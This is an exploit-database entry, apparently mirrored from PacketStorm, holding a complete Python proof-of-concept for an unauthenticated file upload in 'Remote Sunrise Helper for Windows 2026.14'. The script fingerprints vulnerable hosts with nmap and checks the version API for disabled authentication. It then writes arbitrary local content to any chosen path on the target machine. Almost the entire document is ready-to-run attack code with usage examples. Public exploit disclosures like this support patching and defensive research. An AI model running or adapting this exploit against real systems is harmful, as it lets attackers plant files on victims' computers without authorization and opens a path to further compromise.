Share
## https://sploitus.com/exploit?id=PACKETSTORM:219234
#!/usr/bin/env python3
    # Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
    Unauthenticated File Upload
    # Date: 2026-04-20
    # Exploit Author: Chokri Hammedi
    # Software: https://rs.ltd/latest.php?os=win
    # Vendor: https://rs.ltd/
    # Version: 2026.14
    # Tested on: Windows 10 / Windows 11
    #
    # Identification:
    # nmap -p- -T4 <target> --script ssl-cert
    # Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
    
    import requests, json, sys, urllib3, os, uuid
    urllib3.disable_warnings()
    
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_ip> <api_port> <local_file>
    <remote_path>")
        print(f"Example: {sys.argv[0]} 192.168.1.103 49737 payload.txt
    'C:/Users/Public/pwned.txt'")
        sys.exit(1)
    
    target = sys.argv[1]
    api_port = sys.argv[2]
    local_file = sys.argv[3]
    remote_path = sys.argv[4]
    url = f"https://{target}:{api_port}"
    headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
    
    try:
        r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
        data = r.json()
    
        if data.get("requires.auth") == False:
            http_port = data.get("http.port")
            print(f"[+] VULNERABLE - {target}")
            print(f"    Host: {data.get('host.name')} | OS:
    {data.get('win.version')}")
            print(f"    HTTP Port: {http_port}")
    
            file_id = str(uuid.uuid4()).replace("-", "")[:10]
    
            r = requests.get(f"{url}/api/createFile={remote_path}",
                            headers={**headers, "X-File-ID": file_id},
                            verify=False)
    
            if r.status_code == 200:
                with open(local_file, 'rb') as f:
                    content = f.read()
                    r2 = requests.put(f"http://{target}:{http_port}/api/upload",
                                     headers={"X-File-ID": file_id},
                                     data=content)
    
                if r2.status_code == 200:
                    print(f"[+] File uploaded: {remote_path}")
                else:
                    print(f"[-] Upload failed")
            else:
                print(f"[-] Create failed")
        else:
            print(f"[*] Not vulnerable - authentication required")
    
    except Exception as e:
        print(f"[-] Error: {e}")